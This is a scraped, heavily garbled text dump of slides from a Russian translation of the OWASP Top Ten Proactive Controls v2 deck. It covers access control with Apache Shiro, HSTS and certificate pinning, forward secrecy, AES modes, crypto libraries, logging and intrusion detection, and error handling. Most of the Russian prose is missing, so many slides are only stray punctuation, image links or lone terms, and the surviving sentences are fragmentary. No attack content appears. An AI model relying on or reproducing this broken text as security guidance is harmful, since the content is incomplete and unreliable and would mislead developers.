![Page 57: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/57.jpg)
, Apache Shirohttp://shiro.apache.org/
:
if ( currentUser.hasRole( "schwartz" ) ) {log.info("May the Schwartz be with you!" );
} else {log.info( "Hello, mere mortal." );
}
![Page 58: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/58.jpg)
http://shiro.apache.org/
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {log.info("You may use a lightsaber ring. Use it wisely.");
} else {log.info("Sorry, lightsaber rings are for schwartz masters only.");
}
Apache Shiro Permission Based Access Control
![Page 59: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/59.jpg)
http://shiro.apache.org/
:
if ( currentUser.isPermitted( "winnebago:drive:eagle5" ) ) {log.info("You are permitted to 'drive' the 'winnebago' with license plate (id) 'eagle5'. " +
"Here are the keys - have fun!");} else {
log.info("Sorry, you aren't allowed to drive the 'eagle5' winnebago!");}
Apache Shiro Permission Based Access Control
![Page 60: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/60.jpg)
A1 – Injection A2 – Broken Authentication and
Session Management
A3 – Cross-Site Scripting (XSS)
A4 – InsecureDirect Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with
Known Vulnerabilities
A10 – UnvalidatedRedirects and
Forwards
![Page 61: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/61.jpg)
C7:
![Page 62: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/62.jpg)
HTTPS?
: : ,
!
HTTPShttps://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
https://www.ssllabs.com/projects/best-practices/
![Page 63: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/63.jpg)
HSTS (Strict Transport Security)http://www.youtube.com/watch?v=zEV3HOuM_Vw
Forward Secrecyhttps://whispersystems.org/blog/asynchronous-security/
Certificate Creation Transparencyhttp://certificate-transparency.org
Certificate Pinninghttps://www.owasp.org/index.php/Pinning_Cheat_Sheet
Browser Certificate Pruning
![Page 64: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/64.jpg)
: HSTS (Strict Transport Security)
, HTTPS-
HTTPS
Current HSTS Chrome preload list http://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json
If you own a site that you would like to see included in the preloaded Chromium HSTS list, start sending the HSTS header and then contact: https://hstspreload.appspot.com/
A site is included in the Firefox preload list if the following hold:
It is in the Chromium list (with force-https).
It sends an HSTS header.
The max-age sent is at least 10886400 (18 weeks).
http://dev.chromium.org/sts
![Page 65: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/65.jpg)
Pinning ( )?
Pinning is a key continuity scheme
Detect when an imposter with a fake but CA validated certificate attempts to act like the real server
2 Types of pinning
Carry around a copy of the server's public key;
Great if you are distributing a dedicated client-server application since you know the server's certificate or public key in advance
Note of the server's public key on first use
Trust-on-First-Use (TOFU) pinning
Useful when no a priori knowledge exists, such as SSH or a Browser
: Certificate Pinninghttps://www.owasp.org/index.php/Pinning_Cheat_Sheet
![Page 66: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/66.jpg)
: Browser-Based TOFU Pinninghttps://www.owasp.org/index.php/Pinning_Cheat_Sheet
Browser-Based TOFU Pinning : Trust on First Use
HTTP Public Key Pinning IETF Drafthttp://tools.ietf.org/html/draft-ietf-websec-key-pinning-11
« » ( )
:Public-Key-Pins: pin-sha1="4n972HfV354KP560yw4uqe/baXc=";pin-sha1="qvTGHdzF6KLavt4PO0gs2a6pQ00=";pin-sha256="LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=";max-age=10000; includeSubDomains
![Page 67: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/67.jpg)
: Pinning in Play (Chrome)https://www.owasp.org/index.php/Pinning_Cheat_Sheet
![Page 68: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/68.jpg)
: Forward Secrecy
SSL, SSL- , ( )
Perfect forward secrecy: , ( )
PFS, , !
https://whispersystems.org/blog/asynchronous-security/
![Page 69: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/69.jpg)
![Page 70: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/70.jpg)
AES
![Page 71: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/71.jpg)
AES-ECB
![Page 72: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/72.jpg)
AES-GCM (Galois/Counter Mode)
![Page 73: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/73.jpg)
Galois/Counter Mode
GCM : ,
).
, . GCM
, – , , ,
, , , .
![Page 74: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/74.jpg)
AES-CBC
![Page 75: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/75.jpg)
IV
![Page 76: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/76.jpg)
Padding
![Page 77: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/77.jpg)
+
![Page 78: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/78.jpg)
!
![Page 79: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/79.jpg)
HMAC
![Page 80: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/80.jpg)
!
![Page 81: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/81.jpg)
![Page 82: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/82.jpg)
![Page 83: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/83.jpg)
![Page 84: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/84.jpg)
Rest : Google KeyCzarhttps://github.com/google/keyczar
:
Crypter crypter = new Crypter("/path/to/your/keys");String ciphertext = crypter.encrypt("Secret message");String plaintext = crypter.decrypt(ciphertext);
Keyczar is an open source cryptographic toolkit for Java, Python and C++.
Designed to make it easier and safer for developers to use cryptography in their applications.
Secure key rotation and versioning
Safe default algorithms, modes, and key lengths
Automated generation of initialization vectors and ciphertext signatures
![Page 85: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/85.jpg)
Rest : Libsodiumhttps://www.gitbook.com/book/jedisct1/libsodium/details
A high-security, cross-platform & easy-to-use crypto library.
Modern, easy-to-use software library for encryption, decryption, signatures, password hashing and more.
It is a portable, cross-compilable, installable & packageable fork of NaCl, with a compatible API, and an extended API to improve usability even further
Provides all of the core operations needed to build higher-level cryptographic tools.
Sodium supports a variety of compilers and operating systems, including Windows (with MinGW or Visual Studio, x86 and x86_64), iOS and Android.
The design choices emphasize security, and "magic constants" have clear rationales.
![Page 86: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/86.jpg)
C8:
![Page 87: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/87.jpg)
,
Logging framework : SLF4J with Logback or Apache Log4j2.
: , ,
: injection- !
![Page 88: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/88.jpg)
:
, , checkboxes, radio buttons
Forced browsing to common attack entry points
Honeypot URL (e.g. a fake path listed in robots.txt like e.g. /admin/secretlogin.jsp)
![Page 89: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/89.jpg)
App Layer Intrusion Detection : Detection Points Examples
Blatant SQLi or XSS injection attacks.
Workflow sequence abuse (e.g. multi-part form in wrong order).
Custom business logic (e.g. basket vs catalogue price mismatch).
Further study :
AppeSensor OWASP Project
libinjection : from SQLi to XSS – Nick Galbreath
Attack Driven Defense – Zane Lackey
![Page 90: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/90.jpg)
C9: Security Frameworks
![Page 91: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/91.jpg)
Security Frameworks
Don't reinvent the wheel : use existing coding libraries and software frameworks
Use native secure features of frameworks rather than importing third party libraries.
Stay up to date !
![Page 92: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/92.jpg)
A1 – Injection A2 – Broken Authentication and
Session Management
A3 – Cross-Site Scripting (XSS)
A4 – InsecureDirect Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with
Known Vulnerabilities
A10 – UnvalidatedRedirects and
Forwards
: (but not consistently)
![Page 93: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/93.jpg)
C10:
![Page 94: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/94.jpg)
![Page 95: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/95.jpg)
, try/catch , ,
, .
, , , , ,
.
, , Q/A,
.
![Page 96: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/96.jpg)
OWASP Top TenProactive Controls 2.0